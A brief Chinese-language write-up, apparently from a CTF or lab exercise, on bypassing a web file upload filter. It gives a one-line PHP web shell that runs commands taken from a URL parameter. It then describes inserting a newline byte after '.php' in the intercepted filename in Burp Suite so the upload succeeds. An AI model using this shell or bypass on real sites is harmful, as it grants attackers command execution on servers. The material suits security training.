Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
小跌—5 分钟前
Linux:多路转接铭哥的编程日记14 分钟前
【Linux网络】传输层协议UDP看我干嘛!27 分钟前
GME 和MGRE综合实验小李独爱秋28 分钟前
计算机网络经典问题透视:什么是NAPT?它有哪些特点?少年已不再年少年轻以化为青年1 小时前
VirtualBox下虚拟机即可访问互联网,又可访问主机爱奥尼欧1 小时前
【Linux笔记】网络部分——数据链路层mac-arpWhoami!1 小时前
⸢ 拾叁-Ⅱ⸥⤳ 安全水位评估框架(下):安全水位指标知花实央l1 小时前
【Web应用实战】 文件上传漏洞实战:Low/Medium/High三级绕过(一句话木马拿webshell全流程)QT 小鲜肉1 小时前
【Git、GitHub、Gitee】按功能分类汇总Git常用命令详解(超详细)DeamoTech1 小时前
IEC101协议解析工具